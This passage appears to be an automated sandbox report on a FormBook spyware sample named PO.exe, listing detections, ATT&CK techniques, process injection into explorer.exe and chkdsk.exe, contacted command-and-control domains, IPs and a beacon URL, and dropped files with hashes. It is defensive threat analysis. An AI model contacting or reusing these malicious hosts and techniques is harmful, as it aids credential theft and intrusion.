          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000002.00000002.495880776.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000002.00000002.496500751.0000000001640000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.498987937.0000000006050000.00000002.00000001.sdmpBinary or memory string: Progmanlock

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Rootkit1Credential API Hooking1Security Software Discovery141Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion3LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection512Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing11Cached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383909 Sample: PO.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.665asilo.com 2->31 33 tourbuzz.net 2->33 35 tour.tourbuzz.net 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 4 other signatures 2->49 11 PO.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\gif000d.dll, PE32 11->29 dropped 59 Detected unpacking (changes PE section rights) 11->59 61 Maps a DLL or memory area into another process 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 65 Contains functionality to prevent local Windows debugging 11->65 15 PO.exe 11->15         started        signatures6 process7 signatures8 67 Modifies the context of a thread in another process (thread injection) 15->67 69 Maps a DLL or memory area into another process 15->69 71 Queues an APC in another process (thread injection) 15->71 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.deerokoj.com 18->37 39 riceandginger.com 162.241.24.122, 49727, 80 UNIFIEDLAYER-AS-1US United States 18->39 41 3 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 chkdsk.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO.exe16%VirustotalBrowse
          PO.exe15%ReversingLabsWin32.Spyware.Noon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.chkdsk.exe.2a5660.2.unpack100%AviraTR/Patched.Ren.GenDownload File
          8.2.chkdsk.exe.54ef834.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.PO.exe.2670000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.1.PO.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          www.riceandginger.com/fcn/0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          tourbuzz.net
          		52.20.218.92
          		truefalse
            		high
            riceandginger.com
            		162.241.24.122
            		truetrue
              		unknown
              www.deerokoj.com
              		199.247.6.20
              		truetrue
                		unknown
                www.665asilo.com
                		unknown
                		unknowntrue
                  		unknown
                  www.ayescarrental.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.riceandginger.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVrtrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.riceandginger.com/fcn/true
                      • Avira URL Cloud: safe
                      		low

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                        		high
                        http://www.fontbureau.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                          		high
                          http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                              		high
                              http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                		high
                                http://www.tiro.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.goodfont.co.krexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.carterandcone.comlexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.typography.netDexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://fontfabrik.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.fonts.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.sandoll.co.krexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.sakkal.comexplorer.exe, 00000002.00000000.268129348.000000000BC36000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown

                                          Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public

                                          IPDomainCountryFlagASNASN NameMalicious
                                          199.247.6.20
                                          		www.deerokoj.comEuropean Union
                                          		20473AS-CHOOPAUStrue
                                          162.241.24.122
                                          		riceandginger.comUnited States
                                          		46606UNIFIEDLAYER-AS-1UStrue

                                          General Information

                                          Joe Sandbox Version:31.0.0 Emerald
                                          Analysis ID:383909
                                          Start date:08.04.2021
                                          Start time:12:11:21
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 9m 21s
                                          Hypervisor based Inspection enabled:false
                                          Report type:light
                                          Sample file name:PO.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:28
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:1
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@7/3@4/2
                                          EGA Information:Failed
                                          HDC Information:
                                          • Successful, ratio: 13.4% (good quality ratio 12.7%)
                                          • Quality average: 77.3%
                                          • Quality standard deviation: 28.2%
                                          HCA Information:
                                          • Successful, ratio: 91%
                                          • Number of executed functions: 0
                                          • Number of non-executed functions: 0
                                          Cookbook Comments:
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Found application associated with file extension: .exe
                                          Warnings:
                                          Show All
                                          • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 104.43.139.144, 52.147.198.201, 23.54.113.53, 13.88.21.125, 168.61.161.212, 95.100.54.203, 20.82.210.154, 23.0.174.185, 23.0.174.200, 23.10.249.43, 23.10.249.26, 20.54.26.129
                                          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net

                                          Simulations

                                          Behavior and APIs

                                          No simulations

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          162.241.24.122TRANSFER CONFIRMATION_PDF.exeGet hashmaliciousBrowse
                                          • www.riceandginger.com/fcn/?nR-lCh=-ZkPgF4h0LuP&Bj4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwqJ/jNzuESGN

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          tourbuzz.netTT COPY.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          h3dFAROdF3.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          kqwqyoFz1C.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          BsR85tOyjL.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          PURCHASE_ORDER.xlsxGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          zISJXAAewo.exeGet hashmaliciousBrowse
                                          • 52.20.218.92
                                          tDuLlLosre.exeGet hashmaliciousBrowse
                                          • 52.20.218.92

                                          ASN

                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          UNIFIEDLAYER-AS-1US0BAdCQQVtP.exeGet hashmaliciousBrowse
                                          • 74.220.199.6
                                          TazxfJHRhq.exeGet hashmaliciousBrowse
                                          • 192.185.48.194
                                          vbc.exeGet hashmaliciousBrowse
                                          • 50.87.195.61
                                          PRICE_QUOTATION_RFQ_000988_PDF.exeGet hashmaliciousBrowse
                                          • 192.185.164.148
                                          PaymentAdvice.exeGet hashmaliciousBrowse
                                          • 198.57.149.44
                                          PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                          • 162.241.61.249
                                          Aveo 742.htmlGet hashmaliciousBrowse
                                          • 162.241.124.93
                                          Bridgestone 363.htmlGet hashmaliciousBrowse
                                          • 162.241.124.93
                                          nunu.exeGet hashmaliciousBrowse
                                          • 192.185.162.134
                                          GS_ PO NO.1862021.exeGet hashmaliciousBrowse
                                          • 192.185.90.36
                                          Payment Report.htmlGet hashmaliciousBrowse
                                          • 192.185.195.15
                                          receipt-xxxx.htmGet hashmaliciousBrowse
                                          • 162.241.124.32
                                          Order-027165.exeGet hashmaliciousBrowse
                                          • 192.232.218.185
                                          Ewkoo9igCN.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          49Bvnq7iFK.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          OtOXfybCmW.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          Ewkoo9igCN.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          W3aLwWHvWB.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          IJh1SAcSNP.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          OtOXfybCmW.dllGet hashmaliciousBrowse
                                          • 162.241.54.59
                                          AS-CHOOPAUSNew Order.exeGet hashmaliciousBrowse
                                          • 45.63.19.244
                                          B of L - way bill return.exeGet hashmaliciousBrowse
                                          • 45.32.111.89
                                          RFQ#4734.exeGet hashmaliciousBrowse
                                          • 108.61.161.76
                                          winlog.dllGet hashmaliciousBrowse
                                          • 45.63.27.162
                                          xqtEOiEeHh.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          nnrlOwKZlc.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          Balance payment..exeGet hashmaliciousBrowse
                                          • 140.82.59.108
                                          KEyjMfJJQjGet hashmaliciousBrowse
                                          • 155.138.211.25
                                          XQ2fszii3uGet hashmaliciousBrowse
                                          • 155.138.211.25
                                          7sZvYxFtN3.exeGet hashmaliciousBrowse
                                          • 45.76.56.26
                                          2021-04-01.exeGet hashmaliciousBrowse
                                          • 140.82.28.50
                                          deIt7iuD1y.exeGet hashmaliciousBrowse
                                          • 104.207.148.92
                                          E1PyFynLfp.exeGet hashmaliciousBrowse
                                          • 136.244.96.52
                                          hfGKHMTTDR.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          cMOtS8JQVW.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          diagnostic.exeGet hashmaliciousBrowse
                                          • 45.76.172.113
                                          l4gLNU4NcA.exeGet hashmaliciousBrowse
                                          • 45.63.42.1
                                          ekdCcEl5KV.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          4FNTlzlu10.exeGet hashmaliciousBrowse
                                          • 207.246.80.14
                                          SecuriteInfo.com.Trojan.Siggen12.58144.411.exeGet hashmaliciousBrowse
                                          • 45.76.53.14

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\0qs5eq4gqxghkspsiz
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):185856
                                          Entropy (8bit):7.999002923208001
                                          Encrypted:true
                                          SSDEEP:3072:hfhva0w76JwhEkYZNjdYCSGAJG3RQ4UzWdP7NmQfey45grprDHRL/Wdy:hfhvaR6JxBZNxFSGScP7NloKFHRTH
                                          MD5:C76B2A549514C1B2E11142566992D07A
                                          SHA1:79FEF3B446A7732B091745B111A0C73F82DE5DBB
                                          SHA-256:CE5B3CE5686E894A949D127B10FE27382F4737E4DF7B724269D669468434ADF8
                                          SHA-512:70AEF1C4093FB27FB434E4A28B96E914C2A0CEE46CB9982F4E596E9D285A1DF59766354058D28A9DD73BAA3CD24AE3D4086C82AA42C82620F6039CCB36C625B8
                                          Malicious:false
                                          Reputation:low
                                          Preview: ..h*...U/...[H.Jp..vm..y3.L..}......Q`;...:..p.-..2.$z..#..5tdR.R.b.IJZ.V....~...UgOa.%......q2.S....t.+t..7J..3.....V.....AMvw.K1i...Wzk.D.d..yJ..v.@..,.N......\E...YI.....9..Y...L/u..fF.3(...}..t=.E..-.....!;w`...yx..k\z....//.`&.7Z..Af.1e....u?0....K.................s.JF....o;]..$m..t.^.&..H....G.4'.....G..U...q.k.d......l...]...?...u..j_.X...yH...<...1.|.......?.....{.r.D8@..u..'9.!.P.>.s....u.N6.B.$...?.[.r.iq.d...m.j.y.Si.[.....Z"...C.6t.a...T1....I......?.......c...~.&....A\.]....2..+..$a....8....K..)...Ph.v..u.7.MEKYN..8H..........f.=..i.V....e...}I5*....U..Ea...m.k;...Vr.T...{.|..uh....gt/..r..\q...2.A>r.......Z.F...........t.w}..}A..P.{..z).<.x.&.F}.G..:..T..G.......~+.....rD|O.eO.2F...:.K..'.p.DgBkt..7.4. K.....Dv.X..a@.T.)...1{.*.....+-.16..w./..v.~.%9..?#..O...A.........y.'.nhU.+.*..-.K,...x .._&;...U.1.C.C..}.7b...?...G.u<._. l..m1..s~{.B......5'K.'*O^.......l.\.d..}..e.Oj...*.._..4w.{w.K..I...&.8.....W.V....!].]........./k....
                                          C:\Users\user\AppData\Local\Temp\4hohyb48e3wlzft
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):6661
                                          Entropy (8bit):7.963332317122046
                                          Encrypted:false
                                          SSDEEP:96:kBksH+WPGZ9ImHb+KxkeDGwERGvqpW+LNd4YgLv8dYA53lmJolxQtxvz:1WytHb3ilqqpWUddg78uA+JoletNz
                                          MD5:8903F1E0C84D25A97CDA24636A27ED23
                                          SHA1:F6941D060997F540B06D6C6C85B9B56B23549DBC
                                          SHA-256:AE70E7DDAE9D864DD18CF6CDC1DC64C918B1FC01254C5AF6AA7DB3D1596E0010
                                          SHA-512:5FAE1B044DABB5E99607C4F76C8D8C661DAE754BC711074447646874CC70F179AFDB94B8770F1649197B4C118E9119EB61050A0F06184F407BE509257B09DDBB
                                          Malicious:false
                                          Reputation:low
                                          Preview: .~z..>.....b.T..l................K.M.;.R1D7%.T>#?d..).........%..Q]Lokg5M.9......hM...l...e.%i.....}.2>.LHD..U....$ ..9..bn-|xtF:.J..}TP..i.".....v.6z.......V.RCO.....f..'>51-....s..........W^ea]/?.3......b........c;#g......8G,..k..+......d..ds..8...W.88.<...... ....@...1dX$h.....=Hi..%0.hT....'#.....amT.{wE..I..WS..q.!......u.5y..E....m.QBN.....e..&e40,....r~.....A...V.d`\.>.2.......F...&...^n.b..v..../;.IEA.u...f..!...zSo..yu.I.ia]/...F.........}.F...._.).....N$30.z...........dp..~z..n.Qb..2.....T....9<.....f./..M....5.rK..c/+.....z..-/..ok..-_[W-9...ac.......m.|........6B..LH...".0.......ju....<..U.`..,......A.......G...B.&w2....7Cq.MI7.X5'..%w.ys.....Sg.uqm....b..U....T.............D.+@L^... 7..?........l."R-..p.r...Sr.}W..J.p...q....r..|...............5..C?t.//P...As@....owsRT.__[W.........}.u.u....Y.Q.......&B..LH.@fF40,.#J....gjX.tp.d\\..\....f..........d........3N..+?..IE38.r1..%.K...w./i.imi..\n.!...................U..
                                          C:\Users\user\AppData\Local\Temp\nsuA1D.tmp\gif000d.dll
                                          Process:C:\Users\user\Desktop\PO.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):4.091011953873825
                                          Encrypted:false
                                          SSDEEP:48:vpggDzDVKAxlyNHvPviTLNuLebdsbriB4ZYmRSs:BTzxlivPvinktfiuZVR
                                          MD5:A622545967851FAF0405E20376399ACB
                                          SHA1:8000D6463895519F16325B7901321247A1C84D22
                                          SHA-256:06A5FAD63869EF665B9E99BAEA58BCE3BB59E85D19D744D53D0E70F58738FF32
